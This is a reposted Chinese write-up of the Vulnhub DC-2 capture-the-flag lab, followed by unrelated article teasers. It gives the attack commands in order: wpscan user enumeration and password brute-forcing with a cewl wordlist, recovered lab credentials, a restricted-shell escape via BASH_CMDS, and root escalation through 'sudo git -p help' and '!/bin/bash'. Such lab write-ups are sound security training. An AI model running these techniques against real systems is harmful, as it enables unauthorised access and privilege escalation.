Vulnhub靶场 DC-2

news2024/9/22 16:03:10

靶机地址:https://www.vulnhub.com/entry/dc-2,311/
导入到VMware里面去, 设置NAT模式

namp扫描一下c段获取ip地址, 然后再扫描ip地址获取详细的信息
在这里插入图片描述

得到ip 192.168.75.134 无法访问
按照下面这个方法可以访问了
在这里插入图片描述

在kali上的处理

在这里插入图片描述

flag1

网站上就存在
在这里插入图片描述提示了一个cewl工具, 这个工具通过扫描网站生成一个字典

cewl http://dc-2/ -w 1.txt

在这里插入图片描述

用dirsearch 扫描一下网站
存在wordpress后台登录页面 http://dc-2/wp-admin在这里插入图片描述在这里插入图片描述

kali自带的工具wpscan用于wordpress框架漏洞
枚举一下用户
wpscan --url http://dc-2/ -e u
在这里插入图片描述
找到了3个用户, 结合前面cewl生成的字典,爆破一下密码

wpscan --url http://dc-2/ -U admin -P 1.txt
wpscan --url http://dc-2/ -U jerry -P 1.txt
wpscan --url http://dc-2/ -U tom -P 1.txt
找到两个用户的密码

jerry / adipiscing
tom / parturient

在这里插入图片描述

在这里插入图片描述

可以登录进后台
在这里插入图片描述

flag2

找到第二个flag
在这里插入图片描述

flag3

ssh远程登录一下
tom的用户可以登录进去
在这里插入图片描述

可以看到flag3
less命令可以查看
在这里插入图片描述
这里不能使用cat命令的限制也可以绕过,
看了一下别人的做法
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
在这里插入图片描述
提示我们需要 su 切换用户
su jerry

flag4

find命令可以找到flag4
在这里插入图片描述

在这里插入图片描述还有最后一个flag, 肯定是需要提权的
提示了一个 git
通过git提权
sudo git -p help
文件的最后加上 !/bin/bash
这里有个小坑, 终端需要小一点, 才不会一页全部显示出来, 才能在最后输入上!/bin/bash, 要是终端太大了, 会直接结束, 没办法输入
在这里插入图片描述

final-flag

在这里插入图片描述

参考文章:
https://blog.csdn.net/a310034188/article/details/121624538
https://www.cnblogs.com/zhijiya/p/15142059.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2127158.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Unity踩坑】使用Input System后UI EventSystem的冲突

在项目中使用Input System,在UI中添加了元素后,再次运行出现下面的错误: InvalidOperationException: You are trying to read Input using the UnityEngine.Input class, but you have switched active Input handling to Input System pac…

基于SpringBoot+Vue+MySQL的考编论坛网站

系统展示 用户前台界面 管理员后台界面 系统背景 在当前信息化高速发展的时代,考编已成为众多求职者的重要选择。然而,备考过程中信息获取、经验交流及资源分享的需求日益凸显。基于SpringBoot、Vue.js与MySQL构建的考编论坛网站应运而生,旨在…

微软面向所有用户推出 Xbox Game Pass Standard

2024 年 8 月下旬,微软启动了 Xbox Game Pass Standard 的公开测试,这是其不断发展的 Game Pass 套餐中的一个新层级。几周后的今天,Xbox Game Pass 标准版已向支持地区的所有 Xbox 用户开放。 Xbox Game Pass 标准版每月收费 14.99 美元。以…

【可测试性实践】C++ 单元测试代码覆盖率统计入门

引言 最近在调研C工程怎么做单元测试和代码覆盖率统计,由于我们工程有使用Boost库,尝试使用Boost.Test来实现单元测试并通过Gcov和Lcov来生成代码覆盖率报告。本文记录完整的搭建测试Demo,希望能带来一定参考。 常用C单测框架对比 特性Goo…

实时系统资源监测:AutoPowerOptionsOK确保电脑性能与节能兼备

科技赋予生活翅膀,让我们在快节奏中翱翔,协调工作与梦想,让每一个梦想都有机会照进现实,绽放光彩——科技的进步不仅推动了社会的发展,也极大地改善了人们的日常生活。在众多科技成果中,电脑作为信息处理的…

Day8 | Java框架 | Maven

Day8 | Java框架 | Maven 分模块开发与设计分模块开发意义分模块开发步骤(模块拆分) 依赖管理概念依赖传递可选依赖与排除依赖 继承与聚合聚合继承 属性属性配置与使用资源文件引用属性版本管理 多环境配置与应用多环境开发跳过测试(了解&…

场外期权是什么?个人可以参与场外期权交易吗?

今天期权懂带你了解场外期权是什么?个人可以参与场外期权交易吗?通过了解场外期权的特点、优点和缺点,投资者可以更好地决定是否使用这种工具进行风险管理或投资操作。 场外期权是什么? 场外期权是指通过私下协商而非在公开交易所交易的期权合约。以下是关于场…

Python基础语法(1)下

输入输出 和用户交互 程序需要和用户进行交互。 用户把信息传递给程序的过程,称为 "输入",也就是用户给计算机下命令就叫做输入。 程序把结果展示给用户的过程,称为 "输出",也就是计算机在向用户汇报工作…

【Hot100】LeetCode—139. 单词拆分

目录 1- 思路题目识别完全背包-动规五部曲 2- 实现⭐单词拆分——题解思路 3- ACM 实现 原题链接:139. 单词拆分 1- 思路 题目识别 识别1 :字符串 和一个 字符串数组 判断识别2:判断字符串能不能由字符串数组拼接形成,返回 true…

SprinBoot+Vue房屋租赁管理系统的设计与实现

目录 1 项目介绍2 项目截图3 核心代码3.1 Controller3.2 Service3.3 Dao3.4 application.yml3.5 SpringbootApplication3.5 Vue 4 数据库表设计5 文档参考6 计算机毕设选题推荐7 源码获取 1 项目介绍 博主个人介绍:CSDN认证博客专家,CSDN平台Java领域优质…

C语言练习题3

1.if语句 /*if语句*/ #include<stdio.h> int main() {int a 10;int b 12;if (a < b) {printf("%d", a);}return 0; }if语句&#xff1a;是条件判断语句。根据小括号中的条件判断该语句中的代码是否执行。如果符合判断的条件就执行&#xff0c;不符合则跳…

零基础国产GD32单片机编程入门(二十一)系统时钟频率配置实战含源码

文章目录 一.概要二.GD32F103C8T6单片机时钟源介绍二.GD32F103C8T6单片机外部高频晶振配置三.GD32F103C8T6单片机内部高频晶振配置四.GD32F103C8T6单片机使用内部8M晶振实验五.工程源代码下载六.小结 一.概要 GD32单片机的时钟源包括多种选项&#xff0c;时钟控制单元提供了一…

滑动窗口+动态规划

前言&#xff1a;分析这个题目的时候&#xff0c;就知道要这两个线段要分开&#xff0c;但是要保证得到最优解&#xff0c;那么我们在选取第二根线段的时候&#xff0c;要保证我们第一根线段是左边最优解 并且我们选的两根线段的右端点一定是我们的数组的点&#xff08;贪心思…

SprinBoot+Vue校园车辆管理系统的设计与实现

目录 1 项目介绍2 项目截图3 核心代码3.1 Controller3.2 Service3.3 Dao3.4 application.yml3.5 SpringbootApplication3.5 Vue 4 数据库表设计5 文档参考6 计算机毕设选题推荐7 源码获取 1 项目介绍 博主个人介绍&#xff1a;CSDN认证博客专家&#xff0c;CSDN平台Java领域优质…

HTML中的文字与分区标记

1.font标记&#xff1a;用来设置文字的字体&#xff0c;大小&#xff0c;颜色&#xff0c;等属性 <!--font:font标记用来设置字体大小颜色属性size:设置字号&#xff0c;默认是3号&#xff0c;1表示4号&#xff0c;-1表示2号&#xff0c;取值范围是[1,7]或[-7,-1]color:设置…

实战案例(4)如果想限制某些终端能上网,哪些不能上网有什么方法呢?

案例四&#xff1a;如果想限制某些终端能上网&#xff0c;哪些不能上网有什么方法呢&#xff1f; 实际中有这样的需求&#xff0c;客户那边希望某些区域只能boss上网或者boss随时都可以上&#xff0c;但是员工需要休息时间才能上&#xff0c;针对这样的需求我们来看看怎么去实现…

Leetcode3271. 哈希分割字符串

Every day a Leetcode 题目来源&#xff1a;3271. 哈希分割字符串 解法1&#xff1a;模拟 按题意模拟。 代码&#xff1a; /** lc appleetcode.cn id3271 langcpp** [3271] 哈希分割字符串*/// lc codestart class Solution { public:string stringHash(string s, int k){…

适用于 Windows 的 Citrix Workspace 中发现两项权限提升

在适用于 Windows 的 Citrix Workspace 应用程序中发现了两个高严重性漏洞CVE-2024-7889 和 CVE-2024-7890。 这些漏洞影响当前版本的 2405 之前的版本以及 LTSR 的 2402 CU1 之前的版本。 Citrix 建议客户立即更新其安装&#xff0c;以减轻使用 Citrix Workspace 环境的用户…

基于亲和性的 GPU 容器绑核策略 Copy

1.引言 在高性能计算和大规模并行任务处理中&#xff0c;GPU已经成为不可或缺的加速器。为了充分发挥GPU的计算能力&#xff0c;通过合理分配CPU核与GPU的绑定来优化CPU和GPU的关系至关重要。我们将探讨socket和NUMA&#xff08;非统一内存访问&#xff09;的概念&#xff0c;并…

计算机的错误计算(九十)

摘要 计算机的错误计算&#xff08;八十九&#xff09;探讨了反双曲余切函数 acoth(x)在 附近的计算精度问题。本节讨论绝对值为大数的反双曲余切函数值的计算精度问题。 Acoth(x) 函数的定义为&#xff1a; 其中 x 的绝对值大于 1 . 例1. 计算 acoth(1.000000000002e15) .…